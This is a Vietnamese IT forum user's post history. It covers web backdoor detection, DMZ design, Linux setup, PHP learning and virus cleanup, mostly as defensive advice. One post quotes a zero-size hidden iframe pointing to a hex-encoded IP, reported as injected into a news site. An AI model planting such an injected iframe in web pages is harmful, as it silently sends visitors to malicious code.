Messages posted by "protectHat"

Hỏi về thiết kế hệ thống máy chủ web lớn

protectHat — GMT

Còn một cái nữa cho bạn là khi mà ứng dụng lớn thì người ta dùng database là noSQL. Bạn tham khảo thêm nha

Nhận biết back-door của ứng dụng web

protectHat — GMT

smile_sad wrote:

Theo mình nghĩ thông thường các folder cho phép upload chủ yếu là images,thumbs... Vậy nếu backdoor upload vào đây thì chắc nó là .php, .asp, .aspx... Mình rành linux hơn windows 1 chút nên mình xin nói về linux nhé. Ý kiến của mình là tạo 1 file .htaccess remove toàn bộ handler .php. Rồi chmod cái .htaccess này sao cho người ta không override nó được. Tuy nhiên nếu mà source code có quá nhiều folder cho phép upload, việc lạm dụng .htaccess sẽ ảnh hưởng đến performance của hệ thống. Do đó nếu bạn thành thạo code thì có lẽ phải can thiệp vào code để xứ lí thôi. Ở trên mình đưa ra tình huống là cái form upload đó đã chỉ định upload vào 1 folder trong sourcecode. Nhưng nếu attacker tạo mới 1 folder sau đó ném backdoor vào thì phải làm sao? Mọi người tiếp tục thảo luận nhé.

backdoor thường có đuôi là .jpg bạn ạ :D; Dùng firephp là cách dễ nhất, đơn giản nhất đó. Nhưng mà dùng NULL thì dính backdoor là thường

Nhận biết back-door của ứng dụng web

protectHat — GMT

chiro8x wrote:

Bạn nghĩ sao về đoạn mã nhỏ này: Code:
Have fun ^^!.

;-) Mình đã bị cái này nè Code:

Nếu mà có thời gian ngồi coi từng dòng như vậy thì viết ra còn lẹ hơn :-O, nhưng mà project đã đến hạn nên phải tìm null :-(

Nhận biết back-door của ứng dụng web

protectHat — GMT

Thường khi tải một cái template hay một com về. việc đầu tiên là mình dùng AV quét nó (AVG làm tốt việc này). Sau đó mình sẽ xem các thư mục hình ảnh theo chế độ thumbnail. Các hình ảnh mà không hiển thị hoặc quá bé thì sẽ nén lại thành 1 file zip rồi đưa cho virustotal kiểm tra. Về phần code thì mình chạy lên ở local và bật firebug (net) xem code có tải gì khác ở chỗ nào hay không. Lúc đó mới xem trong code có gì.

Nên bắt đầu từ đâu khi học PHP

protectHat — GMT

xnohat wrote:

Đúng vây, việc học một ngôn ngữ lập trình không đơn giản chỉ là học hiểu "cú pháp" ( Programming language sytax ), mà là tổ hợp nhiều kiến thức liên quan đến môn khoa học là khoa học máy tính ( Computer Science ). Vì, biết "cú pháp" của ngôn ngữ không, thì chẳng làm được việc gì, nếu không muốn nói là "vô ích", do ngôn ngữ lập trình chỉ là công cụ diễn dịch tư duy của con người thành các chỉ thị cho máy tính thực thi.

Theo mình mốc thời gian đó có thể hiểu như là thời gian đi học. Học không chỉ một ngôn ngữ đó mà hình dung được mình sẽ làm được gì với nó. Từ những kiến thức về OOP, array ... thì việc mình học tiếp thêm một ngôn ngữ lập trình khác rất là nhanh. Hay nói cách khác là khi mình đã không biết được 1 ngôn ngữ nào cả thì việc học để master 1 cái rất là quan trọng và tốn thời gian. Khi đã được một cái rồi thì nhìn sang ngôn ngữ khác thấy đơn giản hơn. Khi đó mà mình muốn học ngôn ngữ khác thì chỉ cần học những cái khác, cái hay hơn so với cái đầu mà thôi. Thêm một ví dụ nữa là nhiều bạn hỏi nên chọn distro linux nào cho việc bắt đầu. Nhiều người sẽ nói bạn là hãy chọn 1 cái nào mà nhiều tài liệu, nhiều sự hỗ trợ thì dễ học. Sau khi dùng đã quen thì tự bản thân người hỏi sẽ biết là cái nào là phù hợp nhất cho mình

Chiếm server khi đã có shell

protectHat — GMT

Năm nay bạn bao nhiêu tuổi? Con shell đó là của bạn hay là của người ta cho bạn? Máy windows đang chạy thì bạn copy file SAM như vậy thì M$ bán win cho ai nữa?

Cần giúp đỡ về boot iso linux distro bằng grub

protectHat — GMT

Bạn chia sẻ cách giải quyết đi. Lỡ mai mốt có ai search vô thì biết cách giải quyết luôn

Hệ thống mail của cơ quan bị giả mạo

protectHat — GMT

Bướm Đêm wrote:

ngừi ta đã bảo bị fake mail add, dùng google yahoo gì cũng fake và bulk được ráo heheheeeeeee, băm cả cái header nhìn ko ra lun ^^, có thể dùng script, dùng 1 cái mua hay cái tool gì đó lừa tình cái mta thì nó chuyển tới mta ngừi nhận nếu config ko ok, máy cái webmail free từ yahoo, google thì sao mà đỡ đc >"< google app cho 50 users dùng full chức năng mà kakakaaaa

Nay nó giảm xuống 10 rồi bác

Cấu hình apache web server trên linux

protectHat — GMT

1. Mình nghĩ rất đơn giản là dùng .htaccess để bắt lỗi nó, không cần chỉnh apache. 2. tạo thêm cái alias

Cho tớ hỏi cách cài Fedora // với Windows

protectHat — GMT

Nếu sợ mất data thì nên cài vô máy ảo thử trước để hiểu. trong máy ảo cũng chia 4 partition. 1 cái bỏ data, 1 cái bỏ win (Nếu bạn cài win trước thì sau khi cài fedora nó tự nhận được luôn không cần chỉnh gì thêm), 1 cái cho fedora và 1 cái cho swap (dung lượng thường là gấp đôi RAM, RAM 512 thì nó là 1G) Chỉ đến cái grub thì bạn nên tìm coi cái máy boot như thế nào để biết kỹ hơn.

gateway có tới 2 MAC address là như thế nào

protectHat — GMT

Coi bạn kia có poison máy cậu ko? :d

Cho mình cách xoá bớt các phiên bản update Ubuntu trong GNU

protectHat — GMT

tommysmith wrote:

Thanks, mình làm được rồi :) mà mình vào folder boot tuy thấy mấy phiên bản cũ ở đó nhưng ko có quyền xoá, nên search thêm hồi thì thấy vào synaptic tìm mấy phiên bản cũ remove ok rồi :D

Theo mình bạn có thể chỉnh trong boot/grub/grub.cfg để chỉnh menu thôi mà không xoá các kernel cũ

Xin các anh giúp em, website em bị hack

protectHat — GMT

Xin lỗi về sự cố này! file bạn yêu cầu không tồn tại trên server cảu chúng tôi!

Cứu người bị nạn với: dính virus, format C ghost lại, vẫn dính như cũ

protectHat — GMT

Theo mình bạn nên thử down đĩa rescue của Kaspersky ở đây http://support.kaspersky.com/viruses/rescuedisk về quét. Tải về, bỏ vào usb, khởi động từ usb, update và quét. Sau đó mới vào win lại. Có thể sẽ gặp lỗi thì tuỳ lỗi mà xử lý tiếp

Nên bắt đầu từ đâu khi học PHP

protectHat — GMT

http://tutorial.phpvn.org/

Các cách phát hiện máy bị nhiễm virus, trojan, kelog,...

protectHat — GMT

Các bạn biết hết các process đang chạy trong máy thì còn sợ gì bị virus. :d Mình mà mở file ẩn không được là biết chắc luôn.

Máy thật không ping vào được máy ảo.

protectHat — GMT

Bạn thử nói rõ hơn về vị trí cũng như cấu hình mạng của bạn xem. Có phải cái máy ảo có ip là 169.xxx không

Bác nào biết code của chuơng trình clear mật khẩu trong đĩa Hiren boot

protectHat — GMT

Tôi thấy khigiadano nói đúng mà. Trong linux thì làm gì có cơ chế bảo vệ như trong win. Chỉ cần copy đè lên là xong.

Báo tuổi trẻ xài iframe này làm gì?

protectHat — GMT

TQN wrote:

Không chắc, có thể máy của cậu protectHat dính virus thì sao ?

Em có thử cả với máy win và 1 máy Ubuntu rồi mới hỏi mà anh? Tại vì sợ lỡ như mạng bị dính virus mà nó chèn cái iframe lên đầu trang như vậy mà báo cho bên tuổi trẻ thì phiền nên em mới hỏi mọi người PS: Hôm nay vào lại đúng là đã được gỡ ra

Báo tuổi trẻ xài iframe này làm gì?

protectHat — GMT

Sáng nay mình vào chỗ báo tuổi trẻ địa ốc coi tự nhiên thấy có báo có virus. Xem source thấy có dòng Code:

iframe src="http://0x56378C02/25mini/irhqbujzeshod.php" width=0 height=0 frameborder=0>

Mọi người xem giùm mình đó là tại máy mình hay tại báo vậy. Đoạn đó đếm gì mà mình coi không được >

Tăng cường bảo vệ cho hệ thống mạng nội bộ sử dụng DMZ

protectHat — GMT

Mình nói thế này cho các bạn chưa hiểu về DMZ hiểu: VD bây giờ bạn có 1 cái server( mình vd luôn nó chạy web ) đặt tại công ty, công ty bạn có 1 đường ra internet. Các nhân viên trong công ty cũng truy cập internet bằng đường này. Nếu bây giờ bạn cho tất cả đứng sau firewall thì nhân viên có thể truy cập trực tiếp đến server và ngược lại. Nếu nhân viên ở trong mà tấn công hoặc đơn giản là máy nhân viên bị virus thì sẽ bị ảnh hưởng rất lớn vì 2 máy đó ở trong LAN với nhau. Mặt khác nếu web bị lỗi (firewall vẫn chạy tốt, kiểu như bị lỗi SQL inject chẳng hạn. ) thì hacker có thể truy cập đến các máy trong mạng LAN và lấy đi các thông tin trong đó. Bạn nên hiểu là trong DMZ có các máy tính chứ nó không phải là 1 tầng cản lọc như là firewall

tienich-online.us có nguy hiểm không?

protectHat — GMT

Lúc trước mình cũng có làm 1 cái tool để treo nick như vậy nhưng viết bằng VB6, khi nào rảnh mình kiếm source đưa cho mà treo. Chứ đưa cả id với pass như vậy mất không có gì để tiếc đâu

đọc nội dung web bằng javascript ?

protectHat — GMT

Nếu bạn dùng bản jquery 1.5 thì ajax cũng cross-domain được.

đọc nội dung web bằng javascript ?

protectHat — GMT

Cái domain.com đó là cùng sever với js hay sao? mình demo 1 đoạn code dùng jquery lấy file txt nha Code:

$(document).ready(function(){ 
	function contentDisp(){
		$.ajax({
			url : "1.txt",
			success : function (data) {
				$("#content").html(data);
			}
		});
	}
	contentDisp();
});

Khong cho user copy file về máy client

protectHat — GMT

File của bạn là định dạng gì ? doc, xls ... của m$ hay tất cả các loại.

Khong cho user copy file về máy client

protectHat — GMT

@zalman: Mình cũng chưa gặp trường hợp như bạn nhưng có nghe nói đến hệ thống của windows có thể làm được. bạn thử http://www.microsoft.com/windowsserver2003/technologies/rightsmgmt/default.mspx xem sao rồi báo kết quả nha (vì mình cũng chưa làm). @chube: với googlebook thì nó dùng -moz-user-select(mình dùng firefox) để không cho phép mình chọn trên các vùng text hay hình ảnh đó thì mình dùng một cách cực củ chuối là chọn view->page style->no style là vô tư copy các hình ảnh hay text đó (bạn thử đọc Adventures of Sherlock Holmes coi :d)

Lập trình web căn bản

protectHat — GMT

Theo mình mà bạn chưa học gì về web cả. Bây giờ mà bắt đầu bằng HTML thì nên học HTML5 luôn, đừng down ebook cho nặng mà tham khảo các tuts thì nhanh hiểu hơn. Khi đã có kiến thức cơ bản rồi hãy đọc sách

Lập trình web căn bản

protectHat — GMT

MVC thì không phụ thuộc vào ngôn ngữ bạn ạ. PHP cũng có MVC :d bạn có thể tham khảo 1 framework hỗ trợ MVC cho php ở codeigniter.com

cài đặt nhiều hệ điều hành ( win xp , window 7, mac osx, ubuntu) trên

protectHat — GMT

Bạn xem lại thông tin đó nha. Trang của bạn đưa ra là Open Source in Mac OS X. theo http://www.apple.com/opensource/ đoạn Code:

As the first major computer company to make Open Source development a key part of its ongoing software strategy, Apple remains committed to the Open Source development model. Major components of Mac OS X, including the UNIX core, are made available under Apple’s Open Source license, allowing developers and students to view source code, learn from it and submit suggestions and modifications. In addition, Apple uses software created by the Open Source community, such as the HTML rendering engine for Safari, and returns its enhancements to the community.

Thì cái nhân của nó được phân phối theo Apple’s Open Source license. Còn nguyên cái mac os x thì là close source :D.

hoi ve cach khai thac thong tin mot nick yahoo

protectHat — GMT

Bạn biết nick mà cũng không làm gì được thì tớ gửi cho một hướng dẫn từ a=>z có hình minh hoạ nè.